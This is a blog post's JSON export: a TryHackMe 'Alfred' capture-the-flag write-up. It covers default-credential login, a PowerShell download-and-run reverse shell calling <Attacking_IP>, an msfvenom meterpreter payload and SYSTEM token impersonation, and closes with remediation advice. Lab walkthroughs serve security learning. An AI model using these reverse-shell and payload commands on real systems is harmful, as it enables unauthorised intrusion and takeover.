{"id":448,"date":"2021-11-17T22:57:07","date_gmt":"2021-11-17T22:57:07","guid":{"rendered":"https:\/\/nekrotic.co.uk\/?p=448"},"modified":"2021-11-17T22:58:41","modified_gmt":"2021-11-17T22:58:41","slug":"alfred-thm-write-up","status":"publish","type":"post","link":"https:\/\/www.nekrotic.co.uk\/?p=448","title":{"rendered":"Alfred &#8211; THM &#8211; Write-Up"},"content":{"rendered":"\n<h2 class=\"wp-block-heading\">Introduction <\/h2>\n\n\n\n<p>The Alfred room on TryHackMe features the exploitation of default login credentials in a development platform hosted on a Windows server, the abuse of a remote code execution feature to download and execute malware on the system, and then the elevation of privileges to SYSTEM by abusing misconfigured permissions from a meterpreter shell. <\/p>\n\n\n\n<p>This Write-Up will be made up of the following:<\/p>\n\n\n\n<ul class=\"wp-block-list\"><li>Enumeration <\/li><li>Initial Access <\/li><li>Internal Enumeration <\/li><li>Privilege Escalation <\/li><\/ul>\n\n\n\n<h2 class=\"wp-block-heading\">Enumeration <\/h2>\n\n\n\n<p>We first want to start with an Nmap scan to see what we are dealing with. Running Nmap with sudo allows it to perform an ARP scan, and applying the -Pn flag skips host discovery: if ICMP is blocked, Nmap would otherwise assume the host is down and stop the scan. 
<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code><span class=\"has-inline-color has-purple-color\">sudo nmap -vv -A -Pn &lt;Target_IP&gt; <\/span><\/code><\/pre>\n\n\n\n<figure class=\"wp-block-image size-full\"><img decoding=\"async\" width=\"825\" height=\"771\" src=\"https:\/\/nekrotic.co.uk\/wp-content\/uploads\/2021\/11\/953f1e4a27c7e04130b824ec1bc8e159-1.png\" alt=\"\" class=\"wp-image-452\" srcset=\"https:\/\/www.nekrotic.co.uk\/wp-content\/uploads\/2021\/11\/953f1e4a27c7e04130b824ec1bc8e159-1.png 825w, https:\/\/www.nekrotic.co.uk\/wp-content\/uploads\/2021\/11\/953f1e4a27c7e04130b824ec1bc8e159-1-300x280.png 300w, https:\/\/www.nekrotic.co.uk\/wp-content\/uploads\/2021\/11\/953f1e4a27c7e04130b824ec1bc8e159-1-768x718.png 768w\" sizes=\"(max-width: 825px) 100vw, 825px\" \/><\/figure>\n\n\n\n<p>The first thing we notice is ports 80, 3389 and 8080. Ports 80 and 8080 are hosting websites; as for 3389, it is safe to guess it is hosting an RDP server on Windows Server 2008. <\/p>\n\n\n\n<p>We want to visit the IIS webserver first to see what that is all about by browsing to the IP address.  <\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><img decoding=\"async\" width=\"946\" height=\"573\" src=\"https:\/\/nekrotic.co.uk\/wp-content\/uploads\/2021\/11\/953f1e4a27c7e04130b824ec1bc8e159-2.png\" alt=\"\" class=\"wp-image-453\" srcset=\"https:\/\/www.nekrotic.co.uk\/wp-content\/uploads\/2021\/11\/953f1e4a27c7e04130b824ec1bc8e159-2.png 946w, https:\/\/www.nekrotic.co.uk\/wp-content\/uploads\/2021\/11\/953f1e4a27c7e04130b824ec1bc8e159-2-300x182.png 300w, https:\/\/www.nekrotic.co.uk\/wp-content\/uploads\/2021\/11\/953f1e4a27c7e04130b824ec1bc8e159-2-768x465.png 768w\" sizes=\"(max-width: 946px) 100vw, 946px\" \/><\/figure>\n\n\n\n<p>That gave us sweet fuck-all, but we can now visit the 8080 port by appending :8080 to the address. 
<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" width=\"913\" height=\"1024\" src=\"https:\/\/nekrotic.co.uk\/wp-content\/uploads\/2021\/11\/953f1e4a27c7e04130b824ec1bc8e159-3-913x1024.png\" alt=\"\" class=\"wp-image-454\" srcset=\"https:\/\/www.nekrotic.co.uk\/wp-content\/uploads\/2021\/11\/953f1e4a27c7e04130b824ec1bc8e159-3-913x1024.png 913w, https:\/\/www.nekrotic.co.uk\/wp-content\/uploads\/2021\/11\/953f1e4a27c7e04130b824ec1bc8e159-3-268x300.png 268w, https:\/\/www.nekrotic.co.uk\/wp-content\/uploads\/2021\/11\/953f1e4a27c7e04130b824ec1bc8e159-3-768x861.png 768w, https:\/\/www.nekrotic.co.uk\/wp-content\/uploads\/2021\/11\/953f1e4a27c7e04130b824ec1bc8e159-3.png 948w\" sizes=\"(max-width: 913px) 100vw, 913px\" \/><\/figure>\n\n\n\n<p>Fantastic login page. We love a good login page, and with a quick Google search for &#8220;jetty default login&#8221;, we will find the login admin:admin, which will work. <\/p>\n\n\n\n<p>Investigating the jetty application, we find that it offers the feature to execute Windows batch commands as part of the build process, in the project options under configure. This could allow us to execute PowerShell scripts to gain a reverse shell. <\/p>\n\n\n\n<p>We first want to use the PowerShell script Invoke-PowerShellTcp.ps1, which can be found in this GitHub repo: <a href=\"https:\/\/github.com\/samratashok\/nishang\/blob\/master\/Shells\/Invoke-PowerShellTcp.ps1\" title=\"https:\/\/github.com\/samratashok\/nishang\/blob\/master\/Shells\/Invoke-PowerShellTcp.ps1\">https:\/\/github.com\/samratashok\/nishang\/blob\/master\/Shells\/Invoke-PowerShellTcp.ps1<\/a>.<\/p>\n\n\n\n<p>Download that script into your current working directory with the following command, then start a Python web server to serve it to the target. We then craft a payload for the target to execute that downloads the script and uses it to open a reverse shell. 
<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code><span class=\"has-inline-color has-purple-color\">wget -O Invoke-PowerShellTcp.ps1 https:\/\/raw.githubusercontent.com\/samratashok\/nishang\/master\/Shells\/Invoke-PowerShellTcp.ps1<\/span><\/code><\/pre>\n\n\n\n<p>Our payload on the target would be as follows:<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code><span class=\"has-inline-color has-purple-color\">powershell iex (New-Object Net.WebClient).DownloadString('http:\/\/&lt;Attacking_IP&gt;:8000\/Invoke-PowerShellTcp.ps1'); Invoke-PowerShellTcp -Reverse -IPAddress &lt;Attacking_IP&gt; -Port &lt;Attacking_Port&gt; <\/span><\/code><\/pre>\n\n\n\n<figure class=\"wp-block-image size-full\"><img decoding=\"async\" width=\"746\" height=\"381\" src=\"https:\/\/nekrotic.co.uk\/wp-content\/uploads\/2021\/11\/953f1e4a27c7e04130b824ec1bc8e159-5.png\" alt=\"\" class=\"wp-image-459\" srcset=\"https:\/\/www.nekrotic.co.uk\/wp-content\/uploads\/2021\/11\/953f1e4a27c7e04130b824ec1bc8e159-5.png 746w, https:\/\/www.nekrotic.co.uk\/wp-content\/uploads\/2021\/11\/953f1e4a27c7e04130b824ec1bc8e159-5-300x153.png 300w\" sizes=\"(max-width: 746px) 100vw, 746px\" \/><\/figure>\n\n\n\n<p>Once our listener and Python HTTP server are running, we build the project and wait for our shell. <\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><img decoding=\"async\" width=\"700\" height=\"247\" src=\"https:\/\/nekrotic.co.uk\/wp-content\/uploads\/2021\/11\/953f1e4a27c7e04130b824ec1bc8e159-7.png\" alt=\"\" class=\"wp-image-463\" srcset=\"https:\/\/www.nekrotic.co.uk\/wp-content\/uploads\/2021\/11\/953f1e4a27c7e04130b824ec1bc8e159-7.png 700w, https:\/\/www.nekrotic.co.uk\/wp-content\/uploads\/2021\/11\/953f1e4a27c7e04130b824ec1bc8e159-7-300x106.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" \/><\/figure>\n\n\n\n<p>We can now get our user flag and begin enumerating for our route to root. 
<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">Internal Enumeration <\/h2>\n\n\n\n<p>Going through the usual Windows enumeration and using the following command, we notice we have SeDebugPrivilege, SeImpersonatePrivilege and SeCreateGlobalPrivilege. <\/p>\n\n\n\n<pre class=\"wp-block-code\"><code><span class=\"has-inline-color has-purple-color\">whoami \/priv <\/span><\/code><\/pre>\n\n\n\n<figure class=\"wp-block-image size-full\"><img decoding=\"async\" width=\"697\" height=\"512\" src=\"https:\/\/nekrotic.co.uk\/wp-content\/uploads\/2021\/11\/953f1e4a27c7e04130b824ec1bc8e159-8.png\" alt=\"\" class=\"wp-image-465\" srcset=\"https:\/\/www.nekrotic.co.uk\/wp-content\/uploads\/2021\/11\/953f1e4a27c7e04130b824ec1bc8e159-8.png 697w, https:\/\/www.nekrotic.co.uk\/wp-content\/uploads\/2021\/11\/953f1e4a27c7e04130b824ec1bc8e159-8-300x220.png 300w, https:\/\/www.nekrotic.co.uk\/wp-content\/uploads\/2021\/11\/953f1e4a27c7e04130b824ec1bc8e159-8-80x60.png 80w\" sizes=\"(max-width: 697px) 100vw, 697px\" \/><\/figure>\n\n\n\n<p>We want a meterpreter shell to abuse this, load the incognito module, and steal the SYSTEM token. <\/p>\n\n\n\n<h2 class=\"wp-block-heading\">Privilege Escalation<\/h2>\n\n\n\n<p>The first thing we will want to do is create our malware to move to the machine. 
We can do this through msfvenom using the following command: <\/p>\n\n\n\n<pre class=\"wp-block-code\"><code><span class=\"has-inline-color has-purple-color\">msfvenom -p windows\/meterpreter\/reverse_tcp -a x86 --encoder x86\/shikata_ga_nai LHOST=&lt;Attacking_IP&gt; LPORT=&lt;Attacking_Port&gt; -f exe -o shell.exe<\/span><\/code><\/pre>\n\n\n\n<figure class=\"wp-block-image size-full\"><img decoding=\"async\" width=\"945\" height=\"244\" src=\"https:\/\/nekrotic.co.uk\/wp-content\/uploads\/2021\/11\/953f1e4a27c7e04130b824ec1bc8e159-4.png\" alt=\"\" class=\"wp-image-455\" srcset=\"https:\/\/www.nekrotic.co.uk\/wp-content\/uploads\/2021\/11\/953f1e4a27c7e04130b824ec1bc8e159-4.png 945w, https:\/\/www.nekrotic.co.uk\/wp-content\/uploads\/2021\/11\/953f1e4a27c7e04130b824ec1bc8e159-4-300x77.png 300w, https:\/\/www.nekrotic.co.uk\/wp-content\/uploads\/2021\/11\/953f1e4a27c7e04130b824ec1bc8e159-4-768x198.png 768w\" sizes=\"(max-width: 945px) 100vw, 945px\" \/><\/figure>\n\n\n\n<p>We then start a Python HTTP server in the directory hosting the .exe and craft a payload, run on build, that grabs the binary and executes it: <\/p>\n\n\n\n<pre class=\"wp-block-code\"><code><span class=\"has-inline-color has-purple-color\">Attacking Machine \nMetasploit listener with the same payload, LHOST and LPORT as your shellcode \npython3 -m http.server \n\nVictim Machine \npowershell \"(New-Object System.Net.WebClient).DownloadFile('http:\/\/&lt;Attacking_IP&gt;:8000\/shell.exe','shell.exe')\"\nStart-Process shell.exe <\/span><\/code><\/pre>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" width=\"842\" height=\"1024\" src=\"https:\/\/nekrotic.co.uk\/wp-content\/uploads\/2021\/11\/953f1e4a27c7e04130b824ec1bc8e159-9-842x1024.png\" alt=\"\" class=\"wp-image-467\" srcset=\"https:\/\/www.nekrotic.co.uk\/wp-content\/uploads\/2021\/11\/953f1e4a27c7e04130b824ec1bc8e159-9-842x1024.png 
842w, https:\/\/www.nekrotic.co.uk\/wp-content\/uploads\/2021\/11\/953f1e4a27c7e04130b824ec1bc8e159-9-247x300.png 247w, https:\/\/www.nekrotic.co.uk\/wp-content\/uploads\/2021\/11\/953f1e4a27c7e04130b824ec1bc8e159-9-768x934.png 768w, https:\/\/www.nekrotic.co.uk\/wp-content\/uploads\/2021\/11\/953f1e4a27c7e04130b824ec1bc8e159-9.png 941w\" sizes=\"(max-width: 842px) 100vw, 842px\" \/><\/figure>\n\n\n\n<p>Now that we have a meterpreter shell, we want to load the incognito module, list the group tokens and then steal the Administrators group token. We do this with the following meterpreter commands: <\/p>\n\n\n\n<pre class=\"wp-block-code\"><code><span class=\"has-inline-color has-purple-color\">load incognito\nlist_tokens -g \nimpersonate_token \"BUILTIN\\Administrators\" <\/span><\/code><\/pre>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" width=\"603\" height=\"1024\" src=\"https:\/\/nekrotic.co.uk\/wp-content\/uploads\/2021\/11\/953f1e4a27c7e04130b824ec1bc8e159-10-603x1024.png\" alt=\"\" class=\"wp-image-469\" srcset=\"https:\/\/www.nekrotic.co.uk\/wp-content\/uploads\/2021\/11\/953f1e4a27c7e04130b824ec1bc8e159-10-603x1024.png 603w, https:\/\/www.nekrotic.co.uk\/wp-content\/uploads\/2021\/11\/953f1e4a27c7e04130b824ec1bc8e159-10-177x300.png 177w, https:\/\/www.nekrotic.co.uk\/wp-content\/uploads\/2021\/11\/953f1e4a27c7e04130b824ec1bc8e159-10.png 654w\" sizes=\"(max-width: 603px) 100vw, 603px\" \/><\/figure>\n\n\n\n<p>Running getuid confirms we now have a SYSTEM shell, and we can take the root.txt flag. 
<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><img decoding=\"async\" width=\"312\" height=\"51\" src=\"https:\/\/nekrotic.co.uk\/wp-content\/uploads\/2021\/11\/953f1e4a27c7e04130b824ec1bc8e159-11.png\" alt=\"\" class=\"wp-image-470\" srcset=\"https:\/\/www.nekrotic.co.uk\/wp-content\/uploads\/2021\/11\/953f1e4a27c7e04130b824ec1bc8e159-11.png 312w, https:\/\/www.nekrotic.co.uk\/wp-content\/uploads\/2021\/11\/953f1e4a27c7e04130b824ec1bc8e159-11-300x49.png 300w\" sizes=\"(max-width: 312px) 100vw, 312px\" \/><\/figure>\n\n\n\n<h2 class=\"wp-block-heading\">Final Thoughts <\/h2>\n\n\n\n<p>As we can see, a few things would stop this attack. First and most important, change the default credentials on the jetty webserver. After that, run the service as a low-privilege user with restricted permissions, and remove SeImpersonatePrivilege from that account to close the privilege escalation route. <\/p>\n","protected":false},"excerpt":{"rendered":"<p>Introduction The Alfred room on TryHackMe features the exploitation of Default login credentials in a development platform held on the server of a Windows machine, the abuse of a remote<\/p>\n<p><a href=\"https:\/\/www.nekrotic.co.uk\/?p=448\" class=\"more-link\">Continue reading<span class=\"screen-reader-text\">Alfred &#8211; THM &#8211; 
Write-Up<\/span><\/a><\/p>\n","protected":false},"author":1,"featured_media":451,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[2],"tags":[],"class_list":["post-448","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-write-up"],"_links":{"self":[{"href":"https:\/\/www.nekrotic.co.uk\/index.php?rest_route=\/wp\/v2\/posts\/448","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.nekrotic.co.uk\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.nekrotic.co.uk\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.nekrotic.co.uk\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.nekrotic.co.uk\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=448"}],"version-history":[{"count":10,"href":"https:\/\/www.nekrotic.co.uk\/index.php?rest_route=\/wp\/v2\/posts\/448\/revisions"}],"predecessor-version":[{"id":472,"href":"https:\/\/www.nekrotic.co.uk\/index.php?rest_route=\/wp\/v2\/posts\/448\/revisions\/472"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.nekrotic.co.uk\/index.php?rest_route=\/wp\/v2\/media\/451"}],"wp:attachment":[{"href":"https:\/\/www.nekrotic.co.uk\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=448"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.nekrotic.co.uk\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=448"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.nekrotic.co.uk\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=448"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}